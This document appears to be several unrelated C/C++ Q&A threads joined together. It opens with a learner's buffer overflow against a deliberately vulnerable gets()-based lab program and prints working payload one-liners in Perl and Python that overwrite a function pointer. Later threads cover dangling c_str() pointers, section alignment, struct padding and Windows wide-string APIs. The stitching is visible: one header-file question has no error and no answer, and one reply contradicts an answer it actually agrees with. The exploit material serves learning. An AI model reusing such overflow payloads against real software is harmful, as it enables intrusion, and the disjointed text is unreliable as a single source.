I am trying to learn more about cyber security, in this case about buffer overflows. I have a simple program whose control flow I want to change:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    volatile int (*fp)();
    char buffer[64];

    fp = 0;
    gets(buffer);
    if (fp) {
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();
    }
}
By using some tools I have determined that the function pointer (fp) gets its value overwritten after 72 characters have been written into the buffer. The function win() is located at value 0xe5894855, so after 72 characters I need to provide that value in the input for the program to jump to the desired function.
However I am facing this issue:
By piping the output of Python 3's print("A"*18*4 + "UH" + "\x89" + "\xe5") into the C program, I should be getting the desired value 0xe5894855 in the section marked in red. Instead, I am getting malformed hex from somewhere: 89 picks up an extra C2, and the incorrect e5 value overflows into the next part of the stack (those parts of the stack are zero initially, but change once the overflow is attempted).
Why is this happening? Am I putting hex values into C program incorrectly?
Edit: I still have not figured out why passing hex through Python did not work, but I found a different method using Perl: perl -e 'print "A"x4x18 . "\x55\x48\x89\xe5"', which did work. The address I needed to jump to was also incorrect (which I fixed as well).
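A likely explanation for the Python 3 attempt: print() writes text, not raw bytes. The string "\x89" is the code point U+0089, which UTF-8 encodes as the two bytes C2 89, which is exactly the stray C2 observed. Writing bytes directly sidesteps the encoding, for example: python3 -c 'import sys; sys.stdout.buffer.write(b"A"*72 + b"\x55\x48\x89\xe5")'. Note also that 0xe5894855, read as the little-endian bytes 55 48 89 e5, is the standard push rbp; mov rbp, rsp prologue, which suggests the value originally taken as the address was really the first bytes of win()'s machine code rather than its location.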
This is a header file that I'm getting the error on.
#include <vector>
#include <fstream>
#ifndef CRYPTO_H
#define CRYPTO_H
// given a char c return the encrypted character
char encrypt(char c);
// given a char c return the decrypted character
char decrypt(char c);
// given a reference to an open file, return a vector with the # of characters, words, lines
std::vector<int> stats(std::ifstream& infile);
#endif
Please let me know what you think.
Thanks!!
I'm trying to display a simple message within my first MFC application.
Strangely, the first sample doesn't work, while the second one works correctly.
auto text = std::to_wstring(1).c_str();
MessageBox(text, NULL, 0); // Not ok, the message is empty
auto temp = std::to_wstring(1);
MessageBox(temp.c_str(), NULL, 0); // Ok, display 1
Can you explain why this happens?
Yes, in the first example the wstring created by the call to std::to_wstring is a temporary that only lives until the end of the statement. After the line executes it has been destroyed, so the pointer you saved from c_str() dangles.
In the second example, the wstring is still in scope and valid, and so the call to .c_str() works.
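A corollary worth noting: the temporary lives until the end of the full expression, so handing c_str() straight to the call in a single statement is safe; only storing the pointer for later use dangles. A minimal sketch, mirroring the question's own call:

// OK: the temporary wstring returned by to_wstring is destroyed
// only after MessageBox returns
MessageBox(std::to_wstring(1).c_str(), NULL, 0);

// Dangling: the temporary dies at the end of this statement,
// so 'text' points at freed storage
auto text = std::to_wstring(1).c_str();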
No, the other answer is wrong. Look at the implementation of c_str(). c_str() basically returns an LPCWSTR, call it a const WCHAR* or const wchar_t* or whatever, but the pointer it returns points at the wstring's internal buffer. The problem is that after the line of code executes, the wstring returned from to_wstring() is no longer valid, and so the pointer returned by c_str() is garbage. For fun, try the following code:
// cstr.cpp
#include <iostream>
#include <string>
using namespace std;

int main(int argc, char* argv[])
{
    // Case 1: dangling; the temporary wstring is gone by the time temp is used
    auto temp = to_wstring(1).c_str();
    wprintf(L"%s\n", temp);

    // Case 2: named wstring, pointer requested at the call site; valid
    auto temp2 = to_wstring(1);
    wprintf(L"%s\n", temp2.c_str());

    // Case 3: named wstring kept in scope; the c_str() pointer stays
    // valid as long as ws is alive and unmodified
    wstring ws = to_wstring(1);
    auto temp3 = ws.c_str();
    wprintf(L"%s\n", temp3);
}
I compiled the above from a VC++ shell prompt with: cl.exe cstr.cpp
If the other answer were correct, then the last line should output garbage or nothing, because according to that answer the pointer from c_str() is itself a temporary. But if my answer is correct, then it should output 1 (which it does). If all else fails, look at the implementation source code.
It seems that top-level objects in GCC targeting x86 that are >= 32 bytes automatically get 32-byte alignment. This may be nice for performance, but I'm collecting an array of thingies from all my object files in a user-defined section, and the extra alignment gaps play havoc with this array. Is there any way to prevent this object alignment?
To clarify: I have a low-aligned struct, and different object files define data in the form of an array of that struct in a user-defined section, with the purpose of making one application-wide array.
As soon as one of those arrays is >= 32 bytes, the object alignment, and with it the section alignment, is pushed to 32. When the linker concatenates the separate sections from the object files into the executable, it creates alignment fillers at the module boundaries in that section.
The following program illustrates a possible solution, assuming GCC extensions are acceptable to you:
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

#define ALIGNMENT // __attribute__ ((aligned (8)))

struct A {
    char arr[40];
};

struct A a __attribute__ ((section ("my_data"))) ALIGNMENT = {{'a'}};
struct A b __attribute__ ((section ("my_data"))) ALIGNMENT = {{'b'}};
struct A c __attribute__ ((section ("my_data"))) ALIGNMENT = {{'c'}};

int main(int argc, char **argv)
{
    assert(sizeof(struct A) == 40);
    printf("%c\n", a.arr[0]);
    printf("%c\n", b.arr[0]);
    printf("%c\n", c.arr[0]);
    printf("%lu\n", (unsigned long)(&a));
    printf("%lu\n", (unsigned long)(&b));
    printf("%lu\n", (unsigned long)(&c));
    return 0;
}
My output is:
a
b
c
6295616
6295680
6295744
Note that in my (64-bit) executable each of the three 40-byte structures is 64-byte aligned.
Now uncomment // __attribute__ ((aligned (8))), rebuild and rerun. My output then is:
a
b
c
6295616
6295656
6295696
Now the structures are 8-byte aligned, without gaps.
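Once the gaps are gone, walking the user-defined section from code becomes reliable. A sketch, assuming GNU ld (which defines __start_<name> and __stop_<name> symbols for any section whose name is a valid C identifier), added to the program above:

/* Walk every struct A that any object file placed in "my_data".
   Assumes GNU ld's automatic __start_/__stop_ section symbols and
   that the section contains no alignment fillers between entries. */
extern struct A __start_my_data[];
extern struct A __stop_my_data[];

static void dump_my_data(void)
{
    for (struct A *p = __start_my_data; p < __stop_my_data; ++p)
        printf("%c\n", p->arr[0]);
}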
What's wrong with this code when I compile it with -DPORTABLE?
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    unsigned char data[11];
#ifdef PORTABLE
    unsigned long intv;
#else
    unsigned char intv[4];
#endif
} struct1;

int main() {
    struct1 s;
    fprintf(stderr, "sizeof(s.data) = %d\n", sizeof(s.data));
    fprintf(stderr, "sizeof(s.intv) = %d\n", sizeof(s.intv));
    fprintf(stderr, "sizeof(s) = %d\n", sizeof(s));
    return 0;
}
The output I get on 32 bit GCC:
$ gcc -o struct struct.c -DPORTABLE
$ ./struct
sizeof(s.data) = 11
sizeof(s.intv) = 4
sizeof(s) = 16
$ gcc -o struct struct.c
$ ./struct
sizeof(s.data) = 11
sizeof(s.intv) = 4
sizeof(s) = 15
Where did the extra byte come from?
I always thought 11 + 4 = 15, not 16.
Nothing's wrong with the code; those sizes are correct. The compiler may add padding to structs at its discretion. The size of a struct is only guaranteed to be large enough to hold its elements, so adding the sizes of its elements is not a reliable way to get the size of the struct.
Such padding can be helpful in keeping elements and the structs themselves aligned to specific boundaries, both to avoid alignment errors (perhaps why it's enabled with -DPORTABLE) and as a speed optimization, as Als points out.
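To see exactly where the hidden byte lands, you can print the member offsets with offsetof. A minimal sketch; the offsets in the comments are what a typical 32-bit GCC build produces:

#include <stdio.h>
#include <stddef.h>

typedef struct {
    unsigned char data[11]; /* offsets 0..10 */
    unsigned long intv;     /* offset 12: one padding byte is inserted
                               after data so intv is 4-byte aligned */
} struct1;

int main(void) {
    printf("offsetof(struct1, intv) = %u\n", (unsigned)offsetof(struct1, intv));
    printf("sizeof(struct1)         = %u\n", (unsigned)sizeof(struct1));
    return 0;
}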
This is due to structure padding.
Compilers are free to add extra padding bytes to structures to optimize access time.
This is the reason you should always use the sizeof operator and never calculate structure sizes by hand.
It's called alignment. Padding is added between members and at the end of structures to keep each member properly aligned, which also helps decrease cache misses. If you want to disable it, you can use something like this:
#pragma pack(push) /* push current alignment to stack */
#pragma pack(1)    /* set alignment to 1 byte boundary */

typedef struct {
    unsigned char data[11];
#ifdef PORTABLE
    unsigned long intv;
#else
    unsigned char intv[4];
#endif
} struct1;

#pragma pack(pop)  /* restore original alignment from stack */
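With GCC you can also get the same effect per struct using the packed attribute; a sketch of the equivalent declaration:

/* GCC/Clang per-struct alternative to #pragma pack(1) */
typedef struct {
    unsigned char data[11];
    unsigned long intv;
} __attribute__((packed)) struct1_packed; /* sizeof == 15 on a 32-bit target */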
I'm trying to get a simple piece of code I found on a website to work in VC++ 2010 on Windows Vista 64-bit:
#include "stdafx.h"
#include <windows.h>
int _tmain(int argc, _TCHAR* argv[])
{
DWORD dResult;
BOOL result;
char oldWallPaper[MAX_PATH];
result = SystemParametersInfo(SPI_GETDESKWALLPAPER, sizeof(oldWallPaper)-1, oldWallPaper, 0);
fprintf(stderr, "Current desktop background is %s\n", oldWallPaper);
return 0;
}
It does compile, but when I run it, I always get this error:
Run-Time Check Failure #2 - Stack around the variable 'oldWallPaper' was corrupted.
I'm not sure what is going wrong, but I noticed that the value of oldWallPaper looks something like "C\0:\0\0U\0s\0e\0r\0s[...]", and I'm wondering where all the \0s come from.
A friend of mine compiled it on Windows XP 32-bit (also VC++ 2010) and is able to run it without problems.
Any clues/hints/opinions?
Thanks
The doc isn't very clear. The returned string is an array of WCHARs, two bytes per character, not one, so you need room for twice as many bytes or you get a buffer overrun. Try:
BOOL result;
WCHAR oldWallPaper[MAX_PATH + 1];

// uiParam is the buffer size in characters, not bytes
result = SystemParametersInfo(SPI_GETDESKWALLPAPER,
                              MAX_PATH, oldWallPaper, 0);
See also:
http://msdn.microsoft.com/en-us/library/ms724947(VS.85).aspx
http://msdn.microsoft.com/en-us/library/ms235631(VS.80).aspx (string conversion)
Every Windows API function that deals with strings has two versions:
SystemParametersInfoA() // ANSI
SystemParametersInfoW() // Unicode
The version ending in W is the wide-character (i.e. Unicode) version of the function. All the \0's you are seeing are because every character you're getting back is Unicode (UTF-16), 16 bits or two bytes per character, and for ASCII text the second byte happens to be 0. So you need to store the result in a wchar_t array and use wprintf instead of printf:
wchar_t oldWallPaper[MAX_PATH];
result = SystemParametersInfo(SPI_GETDESKWALLPAPER, MAX_PATH-1, oldWallPaper, 0);
wprintf( L"Current desktop background is %s\n", oldWallPaper );
So you can use the A version, SystemParametersInfoA(), if you are hell-bent on not using Unicode. For the record, though, you should always prefer Unicode.
Usually SystemParametersInfo() is a macro that expands to the W version when UNICODE is defined for your build.
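For completeness, a minimal sketch of the explicit ANSI route; it avoids the wide-character mismatch entirely, at the cost of losing Unicode paths:

#include <windows.h>
#include <stdio.h>

int main(void)
{
    char oldWallPaper[MAX_PATH];

    // The A version fills the buffer with plain chars;
    // uiParam is the buffer size in characters
    BOOL ok = SystemParametersInfoA(SPI_GETDESKWALLPAPER, MAX_PATH,
                                    oldWallPaper, 0);
    if (ok)
        printf("Current desktop background is %s\n", oldWallPaper);
    return 0;
}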